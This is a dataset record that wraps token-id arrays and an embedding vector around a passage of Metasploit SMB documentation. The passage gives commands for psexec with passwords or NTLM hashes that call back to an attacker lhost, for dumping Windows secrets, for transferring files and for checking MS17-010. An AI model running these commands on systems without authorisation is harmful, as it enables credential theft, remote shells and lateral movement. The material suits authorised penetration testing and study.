[ 22571, 2102, 1027, 6270, 15488, 2497, 1024, 1024, 8778, 27774, 1027, 1015, 4372, 17897, 11657, 6661, 1998, 2265, 2035, 6764, 28667, 9236, 14547, 1024, 2224, 9830, 1013, 26221, 1013, 15488, 2497, 1013, 15488, 2497, 1035, 4372, 18163, 8167, 2229, 2448, 1005, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413, 2007, 1037, 2686, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 17365, 1005, 2265, 8873, 4244, 1027, 2995, 14160, 8167, 2229, 1027, 2995, 4372, 17897, 11657, 5198, 1024, 2224, 9830, 1013, 26221, 1013, 15488, 2497, 1013, 15488, 2497, 1035, 4372, 2819, 20330, 2015, 2448, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 4372, 17897, 11657, 14246, 2361, 6764, 1999, 1037, 15488, 2497, 3745, 1024, 2224, 9830, 1013, 26221, 1013, 15488, 2497, 1013, 15488, 2497, 1035, 4372, 2819, 1035, 14246, 2361, 2448, 15488, 2497, 1024, 1013, 1013, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1013, 3745, 1035, 2171, 12034, 9232, 1027, 2995, 3573, 1027, 2995, 2448, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1013, 3745, 1035, 2171, 12034, 9232, 1027, 2995, 3573, 1027, 2995, 15488, 2497, 8241, 16748, 3686, 1037, 12934, 15488, 2497, 8241, 2029, 13385, 22496, 2077, 4192, 23961, 1035, 3570, 1035, 8154, 2078, 1035, 4945, 1012, 2122, 23325, 2229, 2064, 2059, 2022, 9630, 2101, 1024, 2224, 9830, 1013, 8241, 1013, 5425, 1013, 15488, 2497, 2448, 15488, 2497, 5796, 16576, 1011, 5890, 2692, 11368, 3022, 24759, 28100, 2038, 1037, 11336, 2005, 5796, 16576, 1011, 5890, 2692, 1010, 9188, 10721, 2630, 1010, 2029, 2038, 1996, 10673, 2000, 4539, 3645, 1021, 1010, 3645, 1022, 1012, 1015, 1010, 3645, 2262, 1054, 2475, 1010, 1998, 3645, 2184, 1012, 9361, 2005, 18077, 8010, 1024, 2224, 9830, 1013, 26221, 1013, 15488, 2497, 1013, 15488, 2497, 1035, 5796, 16576, 1035, 5890, 2692, 4638, 2184, 1012, 2184, 1012, 2184, 1012, 2603, 4638, 2184, 1012, 2184, 1012, 2184, 1012, 1014, 1013, 2484, 4638, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 1015, 1013, 4638, 15488, 2497, 1024, 1013, 1013, 5884, 1025, 5310, 1024, 3413, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 1015, 1013, 4638, 28744, 2099, 1024, 1013, 2484, 1024, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 1014, 16457, 1027, 3590, 2004, 1997, 25682, 1010, 18804, 13102, 4135, 4183, 6753, 1037, 2309, 18077, 11336, 2005, 2029, 2038, 1996, 10673, 2000, 4539, 3645, 1021, 1010, 3645, 1022, 1012, 1015, 1010, 3645, 2262, 1054, 2475, 1010, 1998, 3645, 2184, 1010, 2440, 4751, 2306, 1996, 18804, 13102, 4135, 4183, 10236, 6279, 1024, 2224, 18077, 1013, 3645, 1013, 15488, 2497, 1013, 5796, 16576, 1035, 5890, 2692, 1035, 10721, 16558, 5657, 2448, 2184, 1012, 2184, 1012, 2184, 1012, 2603, 1048, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 2448, 2184, 1012, 2184, 1012, 2184, 1012, 1014, 1013, 2484, 1048, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 6948, 11589, 1027, 13509, 2448, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413 ]
metasploit
11.txt
1
@ 10. 10. 10. 1 / lhost = 192. 168. 123. 1 run smb : / / domain ; user : pass @ 10. 10. 10. 1 / lhost = 192. 168. 123. 1 smb psexecrunning psexec against a remote host with credentials : use exploit / windows / smb / psexec run smb : / / user : pass8 @ 192. 168. 123. 13 lhost = 192. 168. 123. 1 lport = 5000 running psexec with ntlm hashes : use exploit / windows / smb / psexec run smb : / / administrator : aad3b435b51404eeaad3b435b51404ee : 32693b11e6aa90eb43d32c72a07ceea6 @ 10. 10. 10. 161 lhost = 10. 10. 14. 13 lport = 5000 smb dumpingdumping secrets with credentials : use auxiliary / gather / windows _ secrets _ dump run smb : / / user : pass @ 192. 168. 123. 6 dumping secrets with ntlm hashesuse auxiliary / gather / windows _ secrets _ dump run smb : / / administrator : aad3b435b51404eeaad3b435b51404ee : 15feae27e637cb98ffacdf0a840eeb4b @ 192. 168. 123. 1 smb filesdownload a file : use auxiliary / admin / smb / download _ file run smb : / / a : p4 $ $ w0rd @ 192. 168. 123. 13 / my _ share / helloworld. txt upload a file : use auxiliary / admin / smb / upload _ file echo " my file " > local _ file. txt run smb : / / a : p4 $ $ w0rd @ 192. 168. 123. 13 / my _ share / remote _ file. txt lpath =. / local _ file. txt kerberos authenticationdetails on the kerberos specific option names are documented in kerberos service authenticationrunning psexec against a host : msf6 > use exploit / windows / smb / psexec msf6 exploit ( windows / smb / psexec ) >
[ 0.23495903611183167, -0.20676882565021515, -0.008599603548645973, 0.543440043926239, 0.26323968172073364, 0.34137415885925293, -0.8591547608375549, 0.47946181893348694, 0.03518565371632576, 0.18341973423957825, 0.3079223930835724, 0.11146988719701767, 0.4804958999156952, -0.43454790115356445, -0.513428270816803, -0.20942433178424835, -0.10197140276432037, -0.18256323039531708, -1.2640429735183716, -0.20537042617797852, -0.46730250120162964, 0.16868175566196442, -0.30594876408576965, -0.4746602177619934, 0.08591876178979874, 0.9224868416786194, 0.9336596131324768, 0.09699587523937225, 0.3370175361633301, 0.35693326592445374, 0.48775047063827515, -0.37500494718551636, -0.028961777687072754, -0.4044286608695984, 0.3479694724082947, 0.46657633781433105, 1.1303435564041138, -0.6629073619842529, 0.47985872626304626, -0.6650956273078918, -0.19598743319511414, -0.20779301226139069, 0.34783056378364563, -0.4785815477371216, -0.223751962184906, -0.38073113560676575, 0.5377214550971985, -0.07365438342094421, 1.066760540008545, 0.09881164133548737, 0.30444470047950745, 0.1559593379497528, 0.16056695580482483, 0.3818541169166565, 0.07445786148309708, 0.08211269974708557, -0.38713952898979187, -0.03272036090493202, -0.014423958957195282, -0.07496147602796555, -0.24250178039073944, 0.21592530608177185, 0.15328064560890198, -0.705497682094574, 0.38316476345062256, 0.2824935019016266, 0.19184058904647827, -0.476191908121109, 0.20908842980861664, -0.551496684551239, 0.511681079864502, 0.5617913603782654, -1.3479912281036377, -0.05558256804943085, -0.6666728258132935, -0.1321943998336792, 0.13357245922088623, 0.012907513417303562, 0.07585438340902328, 0.5079507827758789, 0.030091119930148125, 0.6169408559799194, 1.1101049184799194, -0.20395928621292114, -0.5089754462242126, 0.11709906160831451, 0.6593153476715088, 0.6502072811126709, -0.0851452648639679, 0.015786904841661453, 0.24871522188186646, 0.18493469059467316, -0.5337810516357422, -0.5088326930999756, 0.010203060694038868, 0.23341147601604462, -0.882098376750946, -0.30221712589263916, 0.3539840579032898, -0.26916834712028503, 0.7593199610710144, 0.35722753405570984, 0.05283840373158455, 0.2355021983385086, -0.6681368350982666, 0.5043892860412598, 0.2579413950443268, -0.015988437458872795, 0.1093691736459732, -0.6512050628662109, 0.7454665303230286, -0.1565629243850708, 0.44835638999938965, -0.6078933477401733, -0.07197365164756775, -0.07363425940275192, 0.029412295669317245, -0.22195769846439362, -0.47956153750419617, 0.39009854197502136, -0.45043036341667175, -0.2925492525100708, 0.6581535339355469, 0.18002282083034515, 0.13455185294151306, 0.0719013512134552, -0.24753542244434357, 0.8325835466384888, -0.8561257123947144, -0.7884865999221802, 0.04802601784467697, -0.09187741577625275, -0.16546054184436798, 0.5490773320198059, -0.23300179839134216, 0.2995126247406006, -0.08913453668355942, 0.25508567690849304, 0.83436119556427, -0.8059952259063721, 0.07499390840530396, 0.4192974269390106, 0.3738163411617279, 1.5394084453582764, -0.029034892097115517, -0.03837651386857033, -0.20484699308872223, 0.20246949791908264, -0.45028406381607056, 0.5347375273704529, -0.32075244188308716, -0.7445124387741089, 0.5625200867652893, -0.10595615953207016, -0.7661737203598022, 0.6540307998657227, -0.17377759516239166, 0.39323943853378296, -0.9109503626823425, -0.00024035770911723375, -0.7405839562416077, 0.9461374878883362, 0.1333332508802414, 0.20175711810588837, -0.1183798760175705, 0.16218742728233337, -0.4613420367240906, -0.5135730504989624, -0.33347374200820923, -0.39979809522628784, 0.33371180295944214, 0.15646927058696747, 0.11681602895259857, 0.20534157752990723, 0.9662594795227051, 0.8069099187850952, -0.008757040835916996, -0.3727607727050781, 0.1555594652891159, 0.48828360438346863, -1.065269947052002, 0.33941012620925903, 0.5316644906997681, 0.8551466464996338, -0.25528618693351746, -0.3513726592063904, 0.081700399518013, -0.8061124682426453, -0.2574772834777832, -0.3568180799484253, -0.021855957806110382, 0.3175775110721588, -0.3613274395465851, 0.44736579060554504, 0.7115384936332703, -0.14368939399719238, -1.2332179546356201, -0.9631216526031494, 0.025728171691298485, -1.398528814315796, -0.5483719110488892, 0.002209635218605399, 0.34846800565719604, 0.7325823903083801, -0.2364473193883896, -0.6334415674209595, 0.802868127822876, 1.0435138940811157, -0.17145197093486786, 0.2286013960838318, 0.8304359316825867, 0.42121848464012146, 0.10571813583374023, -0.1259440928697586, 0.31289830803871155, -0.05669557303190231, -0.5705320835113525, 0.6303877830505371, 0.016372863203287125, 0.03528489172458649, -0.34464097023010254, 0.7479183673858643, 0.3763863146305084, 0.6359258890151978, -0.22525133192539215, -0.5725400447845459, 0.13826309144496918, 0.6171368956565857, -0.8383523225784302, -0.5710763335227966, -0.6038318872451782, -0.07303059101104736, 0.383079469203949, 1.0008304119110107, 0.28916457295417786, -0.5432839393615723, 0.1327463686466217, 0.2843213379383087, -0.5424344539642334, -0.19312211871147156, 0.030280623584985733, 1.0023332834243774, 0.44154465198516846, 0.4677462875843048, 0.12423069030046463, 0.43328022956848145, 0.10812123864889145, -0.42811623215675354, -0.19656842947006226, 0.5381050705909729, 0.5370742678642273, 0.8031488656997681, -0.09047151356935501, -0.009327458217740059, -0.49404263496398926, -0.16308777034282684, 0.7465439438819885, 0.3467162847518921, -0.8827835321426392, -0.9789421558380127, -0.12257438153028488, -0.3814002275466919, -0.4634760320186615, -0.5689431428909302, 0.39508864283561707, 0.15840914845466614, -0.41659677028656006, 0.09997588396072388, -0.3259434998035431, -0.5228567719459534, -0.28101444244384766, -0.1950957030057907, -0.44734522700309753, -1.19560706615448, -1.029664158821106, -0.14265525341033936, 0.48713821172714233, -0.17908351123332977, 1.0393900871276855, -0.21146553754806519, -0.39110541343688965, 0.731837272644043, 0.3628530502319336, 0.6579089164733887, -0.07320970296859741, 0.17571169137954712, -1.070369839668274, 0.0432535819709301, -0.08637523651123047, 0.18050971627235413, -0.3666430711746216, 0.384395569562912, -0.02334503084421158, -0.16348148882389069, -0.01017565093934536, -0.3864262104034424, 0.8506376147270203, 0.27077716588974, 0.35600677132606506, -0.31613078713417053, 0.2429845631122589, -0.40098893642425537, -0.29226046800613403, -0.16402338445186615, -0.28415703773498535, 0.5363849997520447, -0.5482494235038757, -0.0906677171587944, 0.22487251460552216, 0.6801742315292358, -0.10978949069976807, 0.2987269461154938, -0.029502086341381073, 0.11714249104261398, -0.3834501802921295, 1.3034780025482178, 0.020007560029625893, 0.4025091826915741, -0.05342523753643036, -0.49341881275177, 0.4410227835178375, -0.4745536148548126, -0.3942584991455078, -0.49654561281204224, -0.07162278145551682, 0.7421233654022217, 0.32372578978538513, -0.6410672664642334, 0.03444678708910942, 0.10076706111431122, 0.34155091643333435, -0.017884206026792526, -0.4131203293800354, 0.5464179515838623, 0.04827900975942612, 0.6892290115356445, -0.06778133660554886, -0.27471691370010376, -0.2351379543542862, 0.29965639114379883, 0.1601501703262329, -0.41129380464553833, -0.18230879306793213, 0.8437882661819458, -0.4537844955921173, 0.21663552522659302, 0.018597494810819626, 0.4181933104991913, -0.4078921973705292, -0.346540629863739, -0.4361332058906555, -0.0068450081162154675, 0.6478769779205322, 0.2214232087135315, -0.24435488879680634, 0.17186477780342102, -0.8764346837997437, -0.15846334397792816, 0.0897865742444992, 0.47539767622947693, 0.4824368953704834, -0.09655600041151047, 0.1338346153497696, -0.3890995681285858, -0.09458019584417343, -0.6393023729324341, 0.30148211121559143, 0.18445798754692078, 0.7605549693107605, -0.4634193480014801, 0.655083954334259, 0.23820547759532928, 0.11078077554702759, 0.3390127122402191, -0.055825527757406235, -1.13755202293396, 0.4982278645038605, -0.18790313601493835, 0.21996383368968964, 0.022678300738334656, 0.6045482754707336, 0.2848369777202606, -0.01814873516559601, 0.0984465479850769, -0.2426522970199585, -0.1646566241979599, -0.3953179121017456, -1.0185996294021606, -0.18479160964488983, -0.6251556873321533, -0.10145054012537003, -0.30057239532470703, -0.08848680555820465, -0.06438732147216797, -0.09858215600252151, -0.5632007122039795, 0.705134928226471, 0.7437521815299988, 0.9671157598495483, 0.34345743060112, 0.47811800241470337, 0.06498565524816513, -0.23305846750736237, 0.5276857614517212, -0.2516626715660095, 0.3362394869327545, 0.08510445058345795, 0.9333807826042175, 0.14279085397720337, -0.1552349179983139, -0.6821466088294983, -0.1250191628932953, -0.0355096273124218, -0.2825429141521454, 0.36502161622047424, 0.3435078561306, -0.5536792874336243, -0.41896843910217285, 0.008686362765729427, -0.26876264810562134, -0.28788700699806213, 0.2994527816772461, 0.026209115982055664, 1.2201247215270996, 0.265315443277359, -0.6909853219985962, 0.0593058280646801, -0.8194528222084045, 0.28123587369918823, 0.37217211723327637, -0.4666500389575958, 0.06786338239908218, -0.9248315095901489, 0.3278113901615143, -0.4873098134994507, 0.3567875623703003, 0.15829385817050934, 0.3216438293457031, 0.01685315929353237, -1.1042718887329102, -0.05740554630756378, 0.5791311264038086, -0.14916767179965973, -1.3444504737854004, -0.38889703154563904, 0.20351029932498932, 0.5716378688812256, 0.39758801460266113, -0.16574445366859436, -0.8035563826560974, 0.02725278027355671, -0.4242735505104065, 0.43146026134490967, -0.855411171913147, -0.05575304105877876, 0.6701447367668152, -0.2427024245262146, -0.31783244013786316, 0.1318322867155075, -0.4175160229206085, 0.12087113410234451, 0.35627368092536926, 0.15233898162841797, -0.0906422957777977, -0.16704854369163513, 0.8350104093551636, -0.2736630141735077, 0.042959317564964294, 0.19943752884864807, 0.6888012886047363, -0.24777570366859436, 0.45348283648490906, 0.1008099615573883, -0.4108745753765106, 0.42015528678894043, -0.6390427947044373, 0.45338571071624756, 0.5389312505722046, 0.2874371409416199, 0.18678978085517883, -0.13524620234966278, 0.24673156440258026, -0.16338855028152466, 0.30687135457992554, -0.3998928964138031, -0.7225622534751892, 0.05888182297348976, 0.9966753125190735, -0.22446773946285248, 0.14261896908283234, 0.34880706667900085, 0.291939914226532, 0.1388925015926361, -0.5185816287994385, -0.2894223928451538, -0.7923303246498108, 0.029706737026572227, 0.11980314552783966, 0.03279896453022957, 0.17477189004421234, 0.23570820689201355, -0.8479760885238647, -0.39589881896972656, 0.3003256618976593, -0.5458887815475464, 0.22583086788654327, -0.8799178600311279, 0.27018487453460693, -0.7356559634208679, 0.16684415936470032, -0.17443600296974182, 0.005448413081467152, 0.20245316624641418, 0.30528929829597473, -0.29069384932518005, 0.49298176169395447, 0.3925761878490448, -0.24032317101955414, 0.3260243237018585, 0.2659556269645691, -0.09714923053979874, -0.7449299693107605, 0.17525461316108704, 0.45855259895324707, -0.7722745537757874, 0.13868790864944458, 0.16069623827934265, 0.14125581085681915, -0.2015777826309204, -1.6466714143753052, 0.24488329887390137, -1.0232038497924805, -0.3612139821052551, -0.18164998292922974, -0.6888598203659058, -0.555304765701294, -0.0775608941912651, -0.44571173191070557, -0.5205475687980652, -0.3476640284061432, 0.20415861904621124, -0.6516290307044983, 0.19504347443580627, -0.06964632123708725, -0.4496152400970459, -0.4058666527271271, 0.37628254294395447, 0.7622862458229065, 0.08837247639894485, -0.15551388263702393, 0.16697756946086884, 0.21373486518859863, 0.39584454894065857, -0.22547072172164917, -0.6994740962982178, -0.6135572791099548, -0.7552605271339417, -0.22594641149044037, 0.30473485589027405, 0.5498017072677612, -0.2898738980293274, 0.3605557084083557, -0.09013897180557251, -0.09200946241617203, 0.23198089003562927, -0.39657896757125854, 0.19405949115753174, -0.18040743470191956, 0.4712066948413849, -0.22134624421596527, 0.16350558400154114, 0.4899311065673828, 0.6547620892524719, -0.11810999363660812, -0.30920979380607605, 0.13459829986095428, -0.18400602042675018, 0.09864627569913864, -0.8848450183868408, 1.1578468084335327, 0.33646470308303833, -0.6873917579650879, 0.3736821711063385, 0.18647512793540955, 0.16384661197662354, 0.05063629150390625, -0.09835395961999893, 0.8991672992706299, 0.28985846042633057, 0.022123871371150017, -0.9007702469825745, 0.5282511115074158, 0.42612224817276, 0.2395622432231903, 0.0833517536520958, -0.4228564202785492, -0.23807169497013092, 0.27913200855255127, -0.30621400475502014, -0.46267950534820557, -0.48242148756980896, -0.7733944654464722, 0.8162851929664612, 0.20113441348075867, 0.6409986019134521, -0.4275842607021332, -0.7777748107910156, -0.1636415272951126, 0.23294098675251007, 0.3337213099002838, -0.9715379476547241, 0.5480694770812988, 0.1717311441898346, 0.29575642943382263, -0.11528363078832626, 0.5681216716766357, -0.6927012205123901, 0.035601262003183365, 0.963043212890625, 0.003149493597447872, -0.5220497250556946, 0.7083204984664917, 0.5399487614631653, -1.2049973011016846, -0.1980629414319992, -0.24387195706367493, -0.2962924540042877, 0.3031192421913147, -0.05891326069831848, -0.6665947437286377, 0.18976359069347382, 0.115461066365242, 0.09073282033205032, 0.3303837478160858, 0.9285840392112732, -0.04979456216096878, -0.8097218871116638, 0.5862341523170471, -0.6389589905738831, 0.5221399664878845, 0.7664344906806946, -0.3747292459011078, -0.5531482696533203, -0.40451323986053467, -0.2700611352920532, -0.14998474717140198, 0.4256621301174164, 0.39589399099349976, -0.8010437488555908, 0.39161399006843567, 0.024345533922314644, -0.1893789917230606, 0.7691068053245544, 0.5240328311920166, 0.38056865334510803, 0.7366771101951599, 0.35604146122932434, -0.3739420175552368, -0.3111511468887329, -0.25653645396232605, -0.051409076899290085, 0.5657839179039001, -0.721863329410553, -0.2468082308769226, -0.4040449857711792, -0.26923680305480957, -0.40096572041511536, -0.8268133997917175, -1.136247992515564, -0.45572662353515625, -0.45252975821495056, -0.3241676986217499, -0.031619008630514145, 0.018036501482129097, 0.13452261686325073, -0.7739877700805664, -0.21757662296295166, -0.5267399549484253, -0.0705428421497345, -0.47647589445114136, 0.24859432876110077, -0.22526322305202484, 0.1614803522825241, -0.5744096636772156, -0.28442245721817017, -0.08637993782758713, -0.0926455482840538, -0.07326222956180573, -0.41374871134757996, -0.48555222153663635, 0.47985029220581055, -0.3409990668296814, 0.31485438346862793, -0.3672196865081787, -0.3873347043991089, 0.22177591919898987, -0.7736286520957947, 0.1685703545808792, 1.2182432413101196, -0.6638106107711792, 0.5248561501502991, 0.38031819462776184, 0.1260301172733307, 0.34050315618515015, -0.7410777807235718, -0.15269464254379272, 0.8610122799873352, -0.3898375928401947, 0.14099042117595673, 0.7911545634269714, -0.6413671374320984, -0.336570143699646, 0.45284005999565125, -0.49665531516075134, -0.5246299505233765, -0.18535679578781128, -0.01751040294766426, 0.11819089949131012, -0.1439480185508728, 0.22073161602020264, 0.9701570272445679, -0.26380378007888794, -0.38959604501724243, -0.8797627091407776, 0.7456781268119812, 0.3337459862232208, 0.09006978571414948, 0.2079974114894867, -0.16979767382144928, 0.11808893084526062, -0.2695910930633545, 0.12159399688243866, 0.6083891987800598, -0.40284496545791626, 0.405762255191803, 0.31084224581718445, 0.09772409498691559, -0.2280014008283615, -0.5388287901878357, 0.13770152628421783, 0.4364869296550751, -0.04085588827729225, -0.3127821683883667, 0.5810863971710205, -0.7204945087432861, -0.15952430665493011, 0.27905070781707764, -1.0698904991149902, -0.09652027487754822, -0.11477598547935486, -0.4323272705078125, -0.16825048625469208, -0.4781095087528229, -0.7131521105766296, 0.43514877557754517, -0.3619559407234192, 0.031744398176670074, 0.7210490107536316, -0.666325032711029, -0.012033563107252121, 1.1205687522888184, -0.5302647948265076, -0.6176457405090332, -0.3536755442619324, -0.055336128920316696, -1.1005662679672241, -0.916622519493103, 0.423767626285553, 0.36914074420928955, 0.6669732928276062, 0.026868125423789024, -0.3394887447357178, 0.3188304901123047, -0.02058856561779976, -0.45500418543815613, -0.7216344475746155, 0.31901299953460693, -0.5872679948806763, 0.328999400138855, 0.12121900171041489, -0.10080067813396454, 0.16483944654464722, 0.19578994810581207, -0.01457282155752182, -0.14369641244411469, -0.7689588069915771, 0.5496448874473572, 0.17812494933605194, 0.2792946398258209, 0.35093241930007935, 0.3157324492931366, 0.2203642725944519, -0.19075310230255127, 0.32069385051727295, -0.3483980596065521, 0.14806300401687622, 0.5827158689498901, 0.6992834210395813, 0.3890572488307953, 0.659112274646759, -0.039792418479919434, -0.38789477944374084, -0.3902711570262909, 0.41070976853370667, -0.25394943356513977, -0.5305695533752441, 0.26986053586006165, -0.17805707454681396, -0.27442437410354614, 0.3599017262458801, -0.5738052725791931, 0.41535723209381104, 0.35989144444465637, 0.5955760478973389, 0.4125532805919647, 0.1942368894815445, 0.8343257904052734, -0.5650370717048645, 0.47283366322517395, 0.09943977743387222, 0.1641128808259964, -0.3409266471862793, -0.0757836401462555, -0.7806269526481628, 0.5356035828590393, 0.6269258856773376, 0.3042422831058502, -0.22119803726673126, 0.37005850672721863, -0.37902987003326416, 0.77573162317276, 0.12894782423973083, 0.1393667757511139, -0.415586918592453, 0.1464647799730301, -0.5841705799102783, -0.32262611389160156, -0.1663743108510971, -0.02117803879082203, -0.008744943886995316, 0.08699899911880493, 0.6468017101287842, 0.19752652943134308, -0.3148314952850342, -0.5437596440315247, 0.20816271007061005, -0.2834652066230774, 0.4712221920490265, 0.20755340158939362, 0.10873797535896301, -0.4659084975719452, 0.4771014153957367, 0.7774530053138733, 0.1747024804353714, -0.09052608907222748, 0.7451291084289551, 0.22206750512123108, -0.06095077469944954, 0.41123029589653015, 0.17543089389801025, -0.42805927991867065, -0.017818495631217957, -0.2281222641468048, -0.3886052966117859, 0.35597360134124756, -0.1538306176662445, 0.8526759147644043, 0.04614565521478653, -0.4638610780239105, -0.4773246943950653, 0.05849040299654007, -0.16208501160144806, -0.7229495644569397, 1.3023966550827026, 0.13131339848041534, -0.4566337466239929, 0.3463173508644104, -0.09966201335191727, 0.46839818358421326, -0.22244583070278168, -0.2843700349330902, -1.2680302858352661, -0.4632900059223175, -0.2837316691875458, 0.021850690245628357, 0.5478492975234985, -0.29133155941963196, 0.19170446693897247, -0.1302800178527832, -0.5399529933929443, -0.8569909334182739, -0.18152281641960144, -0.2336444854736328, -0.3188505172729492, 0.36320728063583374, 0.36259445548057556, -0.5998001098632812, 0.5164347887039185, -0.5162042379379272, -0.3794063925743103, -0.11621469259262085, 1.0058894157409668, -0.05719985067844391, -0.016240665689110756, 0.08213426917791367, -0.34690427780151367, 0.040703728795051575, -0.7077211141586304, 0.7440876960754395, 0.30319592356681824, -0.4383329451084137, -0.27413132786750793, -0.02278069220483303, -0.9722317457199097, -0.07881768047809601, 0.020237350836396217, -0.08737210184335709, 0.8561066389083862, 0.06458635628223419, -1.195912480354309, 0.02360859513282776, 0.029759760946035385, -0.14105771481990814, 0.006060801446437836, -0.00634591793641448, 0.7827008962631226, -0.29572582244873047, -0.007469626609236002, -1.0511013269424438, 4.45045280456543, 0.15285350382328033, 0.04804612696170807, 0.3249552249908447, 0.059415001422166824, 0.7513248324394226, 1.3497310876846313, -0.12177182734012604, -0.08780675381422043, -0.1213328167796135, 0.3560217022895813, 0.3027237355709076, 0.6181158423423767, 0.36835095286369324, 0.703734278678894, 0.1823408454656601, -0.25102901458740234, 0.46287715435028076, 0.5490368008613586, -0.7404162883758545, -0.8902736306190491, -0.10232089459896088, -0.47318416833877563, 0.5834841132164001, 0.42299121618270874, 0.5316518545150757, 0.12326075881719589, -1.0539729595184326, 0.03889311105012894, -0.3501916229724884, 0.1793965995311737, -0.6753181219100952, 0.054245904088020325, -0.4040771722793579, -0.3936226963996887, -0.1927919089794159, -0.10525012761354446, -0.5415045022964478, -0.25443121790885925, -0.4247748851776123, 0.15583886206150055, 0.3109739422798157, 0.1713605374097824, -0.8042070865631104, 0.4237346947193146, 0.6302787065505981, -0.5293253660202026, -0.23272868990898132, 0.8092337250709534, -0.9356949925422668, 0.271780788898468, 0.5910439491271973, 0.2430991530418396, 0.01999245397746563, -0.12377606332302094, -0.05220285430550575, 0.38620731234550476, -0.4703931510448456, 0.5432396531105042, 0.04825063422322273, 0.9374666810035706, -0.1411246508359909, -0.11153276264667511, 0.15529315173625946, -0.5010695457458496, 1.094044804573059, -0.19257119297981262, -0.23188714683055878, 0.018964434042572975, -0.6689559817314148, -0.508546769618988, -0.37774530053138733, -0.5029544234275818, -0.4084261357784271, 0.7267523407936096, -0.362324595451355, 0.1250288486480713, -0.06278260797262192, 0.31587281823158264, 0.015898430719971657, -0.10937545448541641, -0.7832987904548645, -1.1446315050125122, 0.5814601182937622, 0.47092553973197937, 0.5080807209014893, 0.06794393807649612, -1.109689474105835, -0.048678673803806305, 0.04343170300126076, 0.8629634976387024, -0.03071778081357479, -0.7748831510543823, 0.05199391022324562, 0.3655198812484741 ]
[ 1030, 2184, 1012, 2184, 1012, 2184, 1012, 1015, 1013, 1048, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 2448, 15488, 2497, 1024, 1013, 1013, 5884, 1025, 5310, 1024, 3413, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 1015, 1013, 1048, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 15488, 2497, 8827, 10288, 8586, 15532, 5582, 8827, 10288, 8586, 2114, 1037, 6556, 3677, 2007, 22496, 1024, 2224, 18077, 1013, 3645, 1013, 15488, 2497, 1013, 8827, 10288, 8586, 2448, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413, 2620, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1048, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 6948, 11589, 1027, 13509, 2770, 8827, 10288, 8586, 2007, 23961, 13728, 23325, 2229, 1024, 2224, 18077, 1013, 3645, 1013, 15488, 2497, 1013, 8827, 10288, 8586, 2448, 15488, 2497, 1024, 1013, 1013, 8911, 1024, 9779, 2094, 2509, 2497, 23777, 2629, 2497, 22203, 12740, 2549, 4402, 11057, 2094, 2509, 2497, 23777, 2629, 2497, 22203, 12740, 2549, 4402, 1024, 28188, 2683, 2509, 2497, 14526, 2063, 2575, 11057, 21057, 15878, 23777, 2094, 16703, 2278, 2581, 2475, 2050, 2692, 2581, 3401, 5243, 2575, 1030, 2184, 1012, 2184, 1012, 2184, 1012, 17365, 1048, 15006, 2102, 1027, 2184, 1012, 2184, 1012, 2403, 1012, 2410, 6948, 11589, 1027, 13509, 15488, 2497, 23642, 8566, 8737, 2075, 7800, 2007, 22496, 1024, 2224, 9830, 1013, 8587, 1013, 3645, 1035, 7800, 1035, 15653, 2448, 15488, 2497, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 1020, 23642, 7800, 2007, 23961, 13728, 23325, 2229, 8557, 9830, 1013, 8587, 1013, 3645, 1035, 7800, 1035, 15653, 2448, 15488, 2497, 1024, 1013, 1013, 8911, 1024, 9779, 2094, 2509, 2497, 23777, 2629, 2497, 22203, 12740, 2549, 4402, 11057, 2094, 2509, 2497, 23777, 2629, 2497, 22203, 12740, 2549, 4402, 1024, 2321, 7959, 6679, 22907, 2063, 2575, 24434, 27421, 2683, 2620, 20961, 19797, 2546, 2692, 2050, 2620, 12740, 4402, 2497, 2549, 2497, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 15488, 2497, 6764, 7698, 11066, 1037, 5371, 1024, 2224, 9830, 1013, 4748, 10020, 1013, 15488, 2497, 1013, 8816, 1035, 5371, 2448, 15488, 2497, 1024, 1013, 1013, 1037, 1024, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1013, 2026, 1035, 3745, 1013, 7592, 11108, 1012, 19067, 2102, 2039, 11066, 1037, 5371, 1024, 2224, 9830, 1013, 4748, 10020, 1013, 15488, 2497, 1013, 2039, 11066, 1035, 5371, 9052, 1000, 2026, 5371, 1000, 1028, 2334, 1035, 5371, 1012, 19067, 2102, 2448, 15488, 2497, 1024, 1013, 1013, 1037, 1024, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1013, 2026, 1035, 3745, 1013, 6556, 1035, 5371, 1012, 19067, 2102, 6948, 8988, 1027, 1012, 1013, 2334, 1035, 5371, 1012, 19067, 2102, 17710, 20473, 2891, 27280, 3207, 22081, 2006, 1996, 17710, 20473, 2891, 3563, 5724, 3415, 2024, 8832, 1999, 17710, 20473, 2891, 2326, 27280, 15532, 5582, 8827, 10288, 8586, 2114, 1037, 3677, 1024, 5796, 2546, 2575, 1028, 2224, 18077, 1013, 3645, 1013, 15488, 2497, 1013, 8827, 10288, 8586, 5796, 2546, 2575, 18077, 1006, 3645, 1013, 15488, 2497, 1013, 8827, 10288, 